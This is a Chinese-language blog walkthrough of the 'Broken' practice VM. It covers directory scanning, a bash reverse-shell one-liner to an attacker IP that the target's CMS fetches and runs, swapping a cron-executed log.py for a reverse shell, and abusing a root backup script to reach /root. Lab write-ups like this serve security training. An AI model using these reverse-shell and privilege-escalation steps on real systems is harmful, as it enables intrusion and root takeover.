broken靶机(计划任务提权)

最新推荐文章于 2024-06-29 13:01:34 发布
最新推荐文章于 2024-06-29 13:01:34 发布
阅读量395 收藏
点赞数 1
分类专栏: Walkthrough系列 文章标签: web linux php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/128067108
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:a1bb

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机

2.探测目标靶机开放端口和相应服务

3.gobuster dir -u http://192.168.1.108 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -e

扫描目录,发现些信息

漏洞利用

1.查看网页

2.对cms目录进行扫描,发现有一个cc,访问查看

gobuster dir -u http://192.168.1.108/cms \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -e

3.这里大概就是从本地拿一个文件的意思

GET /fb35519d63b892c0dcd1d527a983774f.sh

4.本地创建一个它要的文件,并写入反弹sell的命令

touch fb35519d63b892c0dcd1d527a983774f.sh

echo 'bash -c "bash -i >& /dev/tcp/192.168.1.106/4444 0>&1"' > fb35519d63b892c0dcd1d527a983774f.sh

5.反弹成功之后,查看家目录下的alice用户,发现script目录是一个满权限的文件夹

6.查看里面的信息后,看下log.py这个脚本

7.发现clear.log会每分钟开头执行一次

8.看源码分析,每分钟都会清理日志的意思,他会调用log.py

9.虽然可以利用,但是他这个脚本只能看,不能改,然而之前的script文件夹可是满权限,那么就可以让这个log.py文件改名,让我们自己写的脚本变为log.py

进行回弹shell操作

10.本地把脚本写好(谷歌python reverse shell 修改ip就行)

11.用wget上车上来,同时设置监听

权限提升

1.反弹shell成功后,看到一个backup(备份)文件夹

2.查看note.txt,大概就是告诉alice网站被黑客攻击了,让它备份到path.txt

3.查看path.txt啥也没有,退到根目录下(/和~不是一个目录)查看到一个backup.py的脚本

4.没有可利用的了 ,上传本地脚本pspy64(github里有)发现一个进程,是root执行的进程。

5.这个root下面也有一个backup.py 应该是一样的脚本,根据前面的脚本信息,把/root写入path.txt就能把root目录给复制一份

6.最终拿到flag,成功拿下!!!

魏钦6666
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
初识靶机_Broken——渗透day05
qq_62716256的博客
08-12 956
初识靶机_Broken——渗透day05
broken 靶机 wp
m0_52496313的博客
10-14 139
broken 靶机 wp
漏洞复现 -- Broken: Gallery
最新发布
2301_80854251的博客
06-29 167
漏洞复现 -- Broken: Gallery
BROKEN-2020: 1靶机
小小猪的博客
07-02 314
BROKEN-2020: 1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.204 扫描端口 访问80端口 扫描目录 查看cms目录 安装,发现第一个flag 扫描cms目录 可以看到多了一个/cms/cc/目录,随便填个地址和端口看看,网页说没有拿到脚本 那么我们看一下他到底是拿什么脚本,本地开启一个服务器,然后再用/cms/cc/页面的功能访问我们本地开启服务器 对方的/cms/cc/网页请求了一个xx.
Broken Gallery 靶场
zhoufy的博客
06-27 292
靶场
【VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 3529
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
DC-4靶机提权超详细过程
02-29
- **查看邮件**:登录后,可能存在邮件服务,其中可能包含进一步提权所需的信息。 - 命令示例:`mail` 或者 `mutt` 等命令行邮件客户端。 - **信息搜集**: - 查看用户家目录下的文件,比如`.bash_history`文件...
OWASP靶机、安全学习、测试
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
WebGoat 2023靶场搭建Broken Access Control通关
apple_51763401的博客
10-14 768
WEBGOAT2023靶场第一关
cengbox2靶机(hydra爆破、公私钥免密登录)
m0_66299232的博客
12-06 563
靶机链接:百度网盘 请输入提取码提取码:zdpr虚拟机网络链接模式:桥接模式攻击机系统:kali linux 2021.11.arp-scan -l探测目标靶机ip2.nmap -p- -A -T4 192.168.1.107探测目标靶机开放端口和服务3.gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 50用gobuster扫描目录,啥也没有1.登录ftp,将note.txt下载下来2.得到俩个名字ke
【VulnHub系列】BrokenGallery
大方子
06-25 570
通过strings来读二进制文件,通过head来读取前几行内容来确定文件类型。端口,发现文件都wget保存到本地,查看网页源码以及文件来收集信息。可以看到JFIF头,说明这个文件是图片文件,更改为Jpg后缀并打开。我们根据从图片获取的信息制作一个简易的字典文件尝试爆破SSH。再用exiftool来看看其他图片,没有发现有隐藏的信息。查看REAMD.md的文件类型,是。用cat发现都是十六进制的字节码。登陆broken,发现其可以通过。再对端口进行详细扫描和漏洞扫描。详细扫描发现80端口有几个文件。
靶机全家桶之OWASP Broken Web Application
Kevin's Blog
05-08 5767
文章目录一、介绍二、下载三、安装四、技巧 一、介绍   OWASP出具的一个集成在虚拟机中的靶机漏洞环境集合–BWA项目,免费、开源,里面包含: 自动化测试工具 测试源码分析工具 观察网络攻击 测试waf类技术 脆弱的web仿真环境 二、下载 最新版是15年的1.2版本:https://sourceforge.net/projects/owaspbwa/files/ 三、安装 》》解压下载的...
OWASP Broken Web Apps渗透测试环境及靶机大全
caoyongsheng的博客
07-27 2272
OWASP下载: 能够运行各种已知漏洞的应用程序官网下载地址: https://sourceforge.net/projects/owaspbwa/files 下载OWASP_Broken_Web_Apps_VM_1.2.ova 然后进虚拟机打开, 在启动以后输入用户名root密码owaspbwa即可 参考操作: https://blog.csdn.net/huweiliyi/article/details/105513776 靶机大全: https://www.cnblogs.com/m.
靶机大全
热门推荐
weixin_30471561的博客
05-18 1万+
本指南主要通过介绍一些常用渗透环境,给pentester们以自己修炼的机会,并配合一些常规的pentest tools达到学习目的 名称: WebGoat 项目地址:http://www.owasp.org/index.php/OWASP_WebGoat_Project 简介:OWASP项目,WebGoat是一个用于讲解典型web漏洞的基于J2EE架构的web应用 名称: ...
windows提权靶机
09-12
Windows提权靶机是用于学习和实践Windows系统提权技术的虚拟机或实体机。它模拟了一个具有已知漏洞或弱点的Windows系统,让安全研究人员、渗透测试人员或学习者能够探索和实践提权攻击技术。 有一些常见的Windows提权靶机可供使用,比如: 1. Metasploitable:这是一个常用的漏洞测试靶机,其中包含了多个已知漏洞,包括Windows系统的一些弱点。 2. VulnHub:这是一个提供多种漏洞靶机的平台,你可以在上面找到适合你学习和实践的Windows提权靶机。 3. HackTheBox:这是一个在线渗透测试实验平台,提供了一系列具有各种漏洞和挑战的虚拟机。 请注意,在使用任何靶机之前,请确保你已经获得了合法的授权,并遵守法律和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值